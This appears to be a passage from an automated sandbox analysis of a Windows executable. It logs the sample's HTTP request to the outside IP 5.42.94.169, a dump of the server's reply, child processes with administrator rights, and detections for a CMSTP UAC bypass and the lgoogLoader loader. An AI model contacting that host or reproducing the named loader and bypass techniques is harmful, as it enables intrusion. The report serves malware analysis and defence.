                                                        Jun 6, 2023 17:14:52.328962088 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328978062 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.328980923 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.328999043 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329018116 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329035044 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329072952 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329132080 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329152107 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329169989 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329189062 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329202890 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329205990 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329225063 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329227924 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329243898 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329262018 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329263926 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329279900 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329299927 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329315901 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329330921 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329350948 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329355955 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329380035 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329397917 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329427004 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329452038 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329471111 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329477072 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329502106 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329514027 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329528093 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329552889 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329571009 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329577923 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329605103 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329617977 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329631090 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329657078 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329668999 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329683065 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329709053 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329726934 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329735041 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329761982 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329787016 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329796076 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329813004 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329824924 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329840899 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329865932 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329883099 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329890966 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329916000 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329935074 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329941988 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329967976 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.329986095 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.329993010 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330020905 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330041885 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330048084 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330075026 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330101013 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330126047 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330152035 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330152035 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330177069 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330204010 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330216885 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330230951 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330257893 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330281973 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330282927 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330311060 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330338955 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330365896 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330385923 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330391884 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330420017 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330445051 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330468893 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330483913 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330495119 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330522060 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330549002 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330550909 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330574989 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330600977 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330610991 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330627918 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330655098 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330672979 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330681086 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330710888 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.330723047 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330775976 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330915928 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.330981016 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.377309084 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377357960 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377378941 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377397060 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377414942 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377437115 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377454996 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377475023 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377497911 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377517939 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377532005 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.377542973 CEST80497085.42.94.169192.168.2.6
                                                        Jun 6, 2023 17:14:52.377588987 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:14:52.433121920 CEST4970880192.168.2.65.42.94.169
                                                        Jun 6, 2023 17:15:00.729165077 CEST4970880192.168.2.65.42.94.169
                                                        • 5.42.94.169
                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.6497085.42.94.16980C:\Users\user\Desktop\file.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 6, 2023 17:14:51.860167980 CEST91OUTGET /customer/368 HTTP/1.1
                                                        Host: 5.42.94.169
                                                        Connection: Keep-Alive
                                                        Jun 6, 2023 17:14:51.911331892 CEST93INHTTP/1.1 200 OK
                                                        Content-Type: text/html; charset=utf-8
                                                        Date: Tue, 06 Jun 2023 15:14:51 GMT
                                                        Server: Kestrel
                                                        Cache-Control: no-cache, no-store, max-age=0
                                                        Transfer-Encoding: chunked
                                                        Data Raw: 34 30 30 30 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 53 65 72 76 65 72 2e 73 74 79 6c 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 70 6e 67 22 2f 3e 0d 0a 20 20 20 20 3c 21 2d 2d 42 6c 61 7a 6f 72 3a 7b 22 73 65 71 75 65 6e 63 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 73 65 72 76 65 72 22 2c 22 70 72 65 72 65 6e 64 65 72 49 64 22 3a 22 39 66 31 63 38 32 33 36 62 63 30 63 34 36 34 36 39 38 63 32 36 65 39 36 64 30 37 61 64 38 32 63 22 2c 22 64 65 73 63 72 69 70 74 6f 72 22 3a 22 43 66 44 4a 38 4e 47 44 6a 6c 62 42 4f 52 4e 45 6c 51 67 69 4d 4b 5c 75 30 30 32 42 35 53 5c 75 30 30 32 42 74 74 2f 52 77 6b 6a 68 61 70 42 43 79 58 74 66 53 4a 33 65 6e 71 42 38 64 69 63 64 57 35 62 51 57 46 4b 47 6f 4a 4c 70 4c 50 50 37 47 37 75 55 6d 38 6c 2f 4d 72 74 62 39 48 36 7a 4f 46 6d 56 32 4c 4f 38 47 38 38 6f 59 58 68 41 62 66 67 79 69 4d 51 78 4e 48 52 4d 30 6d 49 34 55 74 64 68 2f 5c 75 30 30 32 42 47 62 39 70 5c 75 30 30 32 42 79 47 30 4d 57 4b 30 67 6b 79 52 37 77 58 48 35 64 67 38 4d 71 55 37 6e 72 30 6f 57 62 41 64 6a 53 70 66 4a 6d 37 6c 64 39 59 72 4d 32 45 6a 52 47 59 42 68 77 4b 78 57 33 31 74 61 42 32 35 45 68 55 42 33 36 5a 7a 4e 63 69 33 78 36 6f 2f 65 56 42 59 79 4f 71 33 57 63 54 55 74 67 47 53 4c 4c 4f 62 6f 68 56 54 31 50 2f 6e 74 73 75 74 75 58 53 51 65 71 7a 41 65 6a 54 42 5c 75 30 30 32 42 7a 51 35 43 42 6f 57 4a 42 51 75 30 30 36 77 52 57 4c 33 31 66 44 4d 33 30 53 4f 59 50 54 58 35 67 74 6a 44 34 33 65 55 35 77 5c 75 30 30 32 42 30 62 6e 78 70 50 34 70 53 4f 4e 48 39 48 65 4b 44 64 62 51 6b 6e 46 77 30 6e 4e 35 5a 7a 62 65 48 31 48 66 37 75 73 63 6c 70 4a 33 59 57 5c 75 30 30 32 42 51 72 32 7a 41 5a 4d 61 36 4c 64 53 46 45 2f 38 2f 38 55 34 6f 39 61 54 6c 57 6a 35 33 4a 30 79 57 30 6d 32 32 58 36 51 68 51 48 41 73 67 4c 39 5a 46 70 79 47 30 37 58 6d 66 50 41 2f 47 2f 66 65 72 59 5a 55 4b 43 70 38 65 79 4a 7a 32 4c 50 52 31 74 68 41 51 4e 43 64 22 7d 2d 2d 3e 3c 21 2d 2d 42 6c 61 7a 6f 72 3a 7b 22 70 72 65 72 65 6e 64 65 72 49 64 22 3a 22 39 66 31 63 38 32 33 36 62 63 30 63 34 36 34 36 39 38 63 32 36 65 39 36 64 30 37 61 64 38 32 63 22 7d 2d 2d 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 21 2d 2d 42 6c 61 7a 6f 72 3a 7b 22
                                                        Data Ascii: 4000<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <base href="/" /> <link rel="stylesheet" href="css/bootstrap/bootstrap.min.css" /> <link href="css/site.css" rel="stylesheet" /> <link href="Server.styles.css" rel="stylesheet" /> <link rel="icon" type="image/png" href="favicon.png"/> ...Blazor:{"sequence":0,"type":"server","prerenderId":"9f1c8236bc0c464698c26e96d07ad82c","descriptor":"CfDJ8NGDjlbBORNElQgiMK\u002B5S\u002Btt/RwkjhapBCyXtfSJ3enqB8dicdW5bQWFKGoJLpLPP7G7uUm8l/Mrtb9H6zOFmV2LO8G88oYXhAbfgyiMQxNHRM0mI4Utdh/\u002BGb9p\u002ByG0MWK0gkyR7wXH5dg8MqU7nr0oWbAdjSpfJm7ld9YrM2EjRGYBhwKxW31taB25EhUB36ZzNci3x6o/eVBYyOq3WcTUtgGSLLObohVT1P/ntsutuXSQeqzAejTB\u002BzQ5CBoWJBQu006wRWL31fDM30SOYPTX5gtjD43eU5w\u002B0bnxpP4pSONH9HeKDdbQknFw0nN5ZzbeH1Hf7usclpJ3YW\u002BQr2zAZMa6LdSFE/8/8U4o9aTlWj53J0yW0m22X6QhQHAsgL9ZFpyG07XmfPA/G/ferYZUKCp8eyJz2LPR1thAQNCd"}-->...Blazor:{"prerenderId":"9f1c8236bc0c464698c26e96d07ad82c"}--></head><body> ...Blazor:{"
                                                        Jun 6, 2023 17:14:51.911371946 CEST94INData Raw: 73 65 71 75 65 6e 63 65 22 3a 31 2c 22 74 79 70 65 22 3a 22 73 65 72 76 65 72 22 2c 22 70 72 65 72 65 6e 64 65 72 49 64 22 3a 22 39 36 32 35 62 35 61 35 63 35 64 34 34 61 66 34 62 33 66 65 32 31 65 36 39 64 62 33 37 64 65 39 22 2c 22 64 65 73 63
                                                        Data Ascii: sequence":1,"type":"server","prerenderId":"9625b5a5c5d44af4b3fe21e69db37de9","descriptor":"CfDJ8NGDjlbBORNElQgiMK\u002B5S\u002BuagDPVxbc3SHb8CCMDWUoYK5DHawKj1mbQ299YPW03OpQHcw/MC\u002Bswj\u002BvQGomcjrZKVCLLe3JeVGPwGWEpBKwpQTKn\u002Bt2dN9Uxhmo
                                                        Jun 6, 2023 17:14:51.911385059 CEST95INData Raw: 73 4e 62 33 6c 31 65 4c 6b 2f 4a 4d 66 68 6e 63 38 71 4e 36 55 4c 44 57 39 35 64 58 69 35 50 79 72 6d 6f 51 39 78 6e 78 38 35 46 42 68 37 66 4b 31 34 54 6f 4e 56 31 62 47 77 6f 54 74 44 77 56 63 74 26 23 78 32 42 3b 52 4d 26 23 78 32 42 3b 43 46
                                                        Data Ascii: sNb3l1eLk/JMfhnc8qN6ULDW95dXi5PyrmoQ9xnx85FBh7fK14ToNV1bGwoTtDwVct&#x2B;RM&#x2B;CFHfXdPpx6CEeqPzx2I37xjEoQq5HFvBghMxWTGx6KLamcK&#x2B;7bIzPFSOLKSskfXDVGvUctlhrmmQWucyE6bAF5msY7Yl9fDqn3QvVqDFbjbHWaxzA/mbjxKoKUgifQSBwCrYSf9kE0&#x2B;OqHp9Zqa6Bz1x1
                                                        Jun 6, 2023 17:14:51.911403894 CEST97INData Raw: 47 4a 75 4d 6c 53 4d 31 4b 41 48 72 26 23 78 32 42 3b 48 47 35 6c 57 59 76 77 6d 4c 67 49 54 55 35 69 63 4b 36 70 73 59 4a 30 37 37 67 64 59 6f 73 64 56 77 55 41 7a 53 50 6d 74 56 4c 74 54 6e 35 76 6b 62 45 37 4d 71 36 34 65 38 4d 69 46 41 45 36
                                                        Data Ascii: GJuMlSM1KAHr&#x2B;HG5lWYvwmLgITU5icK6psYJ077gdYosdVwUAzSPmtVLtTn5vkbE7Mq64e8MiFAE6D1tIIht8Tq69kmyVVBZEEQGZ7OD89TRFULFAGXTE9K&#x2B;ekTbDiSKDcOHj0tnBxVMWFdOUCp7emKgqqbFKVwxSlRbCD0jjbOB&#x2B;fOzdkc6oUNRdSHAshcbu3HV8WJ8N7ea9rZBOue0p0wIQxBXSxg2dT9H
                                                        Jun 6, 2023 17:14:51.911417961 CEST98INData Raw: 78 32 42 3b 63 5a 64 74 75 61 49 58 4b 4d 68 49 51 69 76 31 49 6d 68 7a 42 58 75 54 6f 4c 46 6c 6d 6e 73 41 74 38 7a 30 72 36 4f 58 62 44 59 76 67 47 78 59 32 6a 41 38 4d 51 68 43 7a 6c 58 6d 39 76 50 35 31 5a 54 64 48 6a 70 67 4a 51 46 26 23 78
                                                        Data Ascii: x2B;cZdtuaIXKMhIQiv1ImhzBXuToLFlmnsAt8z0r6OXbDYvgGxY2jA8MQhCzlXm9vP51ZTdHjpgJQF&#x2B;jcyEkoaAvK5cEnr4iopUGkCY85Nxjar&#x2B;kfWS5JXLfbil/Jqn3OIweJvatTWAm2xk/InYCaJjSEhBh7eB3vPQYzoPbKPG&#x2B;SW7vP6f6whZfQgLxiDTNxKkPzJLwCmj&#x2B;XEoUUeU2/Ihav3KQoB
                                                        Jun 6, 2023 17:14:51.911432028 CEST99INData Raw: 69 66 47 78 34 5a 49 30 68 52 2f 56 6e 4e 36 64 4c 44 65 62 63 77 26 23 78 32 42 3b 67 5a 72 47 75 5a 61 52 68 73 75 49 79 39 26 23 78 32 42 3b 73 6a 76 62 4a 6b 46 48 56 6f 49 68 6a 75 38 4d 57 72 41 70 57 31 78 48 6a 75 26 23 78 32 42 3b 64 51
                                                        Data Ascii: ifGx4ZI0hR/VnN6dLDebcw&#x2B;gZrGuZaRhsuIy9&#x2B;sjvbJkFHVoIhju8MWrApW1xHju&#x2B;dQivr4sZk7Shp8aHeGYnibYOc&#x2B;FHurr9ZSFjVxWiTP&#x2B;lIO0O9UaUFHCw23UEPPm&#x2B;wz3nBOXrqrt6HeltNc4KOZ90xaD992P9x5YnTM7EO/S4jgG9SQHX1oNBoH/nEc0qLP85YZf7oJAuqHldZoU1
                                                        Jun 6, 2023 17:14:51.911446095 CEST101INData Raw: 62 34 75 35 2f 64 53 41 56 55 74 33 62 67 75 6c 6c 4c 35 72 76 4f 45 31 73 42 47 5a 6c 73 76 33 45 55 67 59 68 53 41 79 71 75 71 55 57 45 76 5a 6f 32 64 69 36 6a 7a 72 4e 37 57 6c 43 4b 2f 51 65 4b 4b 5a 6f 73 6a 61 56 36 51 66 73 63 78 69 26 23
                                                        Data Ascii: b4u5/dSAVUt3bgullL5rvOE1sBGZlsv3EUgYhSAyquqUWEvZo2di6jzrN7WlCK/QeKKZosjaV6Qfscxi&#x2B;40MD6mI/w2UMwrXhrjhhwlfYkyBgS&#x2B;WKFP0/z6RtWRdRlBo4Nhya9IQhWMEGCAUJdocUD09Z8u9fylqlIdsqdLl4mYB9lnGCx8B&#x2B;Uev0LvTzoxZf7YWkL/spwOv5SlxS67adnPpFME&#x2B;0&#
                                                        Jun 6, 2023 17:14:51.911465883 CEST102INData Raw: 62 57 71 5a 34 44 5a 7a 6e 31 4d 4b 50 54 55 59 54 74 32 64 76 59 4e 26 23 78 32 42 3b 4e 6f 7a 78 79 2f 4e 35 73 4e 4e 4d 68 43 64 36 36 73 72 62 70 4e 76 33 47 64 76 42 59 57 4b 49 2f 42 31 61 62 7a 34 6a 75 45 5a 55 67 6e 75 4a 35 71 4d 50 4c
                                                        Data Ascii: bWqZ4DZzn1MKPTUYTt2dvYN&#x2B;Nozxy/N5sNNMhCd66srbpNv3GdvBYWKI/B1abz4juEZUgnuJ5qMPLfatd7Ro7ige1DYrdrwpckMtG6LMNmPCV&#x2B;prmJilkqToNeRkHsXGEh6k&#x2B;bCkUjeVIqz9HNi8XwCh/U3d1AjwHlybVJZqYzAcR1U3ZHj/adp60/61te3u8gOOTJjZP8tcUVYt5C4/1NEekqNZWzK89vms
                                                        Jun 6, 2023 17:14:51.911478996 CEST103INData Raw: 23 78 32 42 3b 66 51 59 38 48 5a 31 45 64 64 4e 6a 67 26 23 78 32 42 3b 4e 44 6f 77 6a 74 42 56 38 6d 6f 45 57 32 44 56 44 4a 6f 59 53 67 39 67 48 69 4d 62 4f 67 43 2f 47 63 68 68 6f 62 42 79 49 6a 70 63 76 6c 61 6b 6a 47 4a 47 77 45 79 6c 55 72
                                                        Data Ascii: #x2B;fQY8HZ1EddNjg&#x2B;NDowjtBV8moEW2DVDJoYSg9gHiMbOgC/GchhobByIjpcvlakjGJGwEylUrviK&#x2B;nZmhsijU5IpXhiVRIshB0dgp03Zd9dCbInwwVoMN/dZAGSNp12GYbDb0pLlbCHo6kuQ28TvDIxQ84SRWRKu8RbI3H&#x2B;NSLk9vsJcLuDq&#x2B;gPFtvnbX1haQE0C1rckeDUtQb6/W1eiYY3yrk4
                                                        Jun 6, 2023 17:14:51.911498070 CEST105INData Raw: 52 49 42 37 48 42 4c 26 23 78 32 42 3b 45 72 77 6c 6b 47 30 65 49 4f 4f 46 57 5a 47 38 7a 37 6f 74 4e 5a 61 70 43 37 48 37 26 23 78 32 42 3b 44 49 70 48 47 52 69 72 6c 67 32 69 33 67 6e 67 4e 4e 58 74 4d 76 62 70 30 32 4e 51 45 6d 66 49 67 6c 72
                                                        Data Ascii: RIB7HBL&#x2B;ErwlkG0eIOOFWZG8z7otNZapC7H7&#x2B;DIpHGRirlg2i3gngNNXtMvbp02NQEmfIglr0xSA2vJK9cWz4xLoAXcM5F58CLBdvLdxTD4vBUV4JThtwtI6BMg3UGR/8T6h0SDXdiwR3NMxrn83HcGQ8cP&#x2B;0ORrR6S96Br2xGSo4Y&#x2B;EiPL6HCQSbgsIFJXnr2&#x2B;W&#x2B;S0K3x5jE/NuUrN5C
                                                        Jun 6, 2023 17:14:51.960335970 CEST106INData Raw: 71 41 53 58 6f 39 68 4e 52 55 69 52 38 67 68 68 71 4b 4a 2f 2f 62 56 4e 37 38 71 4f 65 45 76 70 52 54 70 5a 48 67 6d 52 69 55 74 35 70 4c 59 79 75 62 65 4a 49 6b 36 47 7a 6e 74 54 61 36 4f 2f 32 48 42 75 53 38 59 64 56 48 70 4f 52 69 54 72 61 32
                                                        Data Ascii: qASXo9hNRUiR8ghhqKJ//bVN78qOeEvpRTpZHgmRiUt5pLYyubeJIk6GzntTa6O/2HBuS8YdVHpORiTra26rB1VEuvSuSIfNRYvbKgT/lq0E3lMEKTfQGb80Qy6UiQvrvqutFQvRFaCSxtdFZYIO2726WwOIJb6oQKYCI9yOCLO0hkzgBfgJZ&#x2B;&#x2B;9ZuoVU6OyZtsV/tKpUt779WhGpHGcZ2WK7BQFm637Nf4atsTsy


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:17:14:48
                                                        Start date:06/06/2023
                                                        Path:C:\Users\user\Desktop\file.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                        Imagebase:0x1f6c58b0000
                                                        File size:30720 bytes
                                                        MD5 hash:DAF761FB9AAA34A9C2120003694D88A3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Target ID:1
                                                        Start time:17:14:59
                                                        Start date:06/06/2023
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
                                                        Imagebase:0x13570130000
                                                        File size:173672 bytes
                                                        MD5 hash:2778AE0EB674B74FF8028BF4E51F1DF5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Target ID:2
                                                        Start time:17:14:59
                                                        Start date:06/06/2023
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
                                                        Imagebase:0x8b0000
                                                        File size:46688 bytes
                                                        MD5 hash:2B40A449D6034F41771A460DADD53A60
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                        • Rule: JoeSecurity_lGoogLoader, Description: Yara detected lgoogLoader, Source: 00000002.00000002.492960569.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:16.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:19.4%
                                                          Total number of Nodes:31
                                                          Total number of Limit Nodes:1
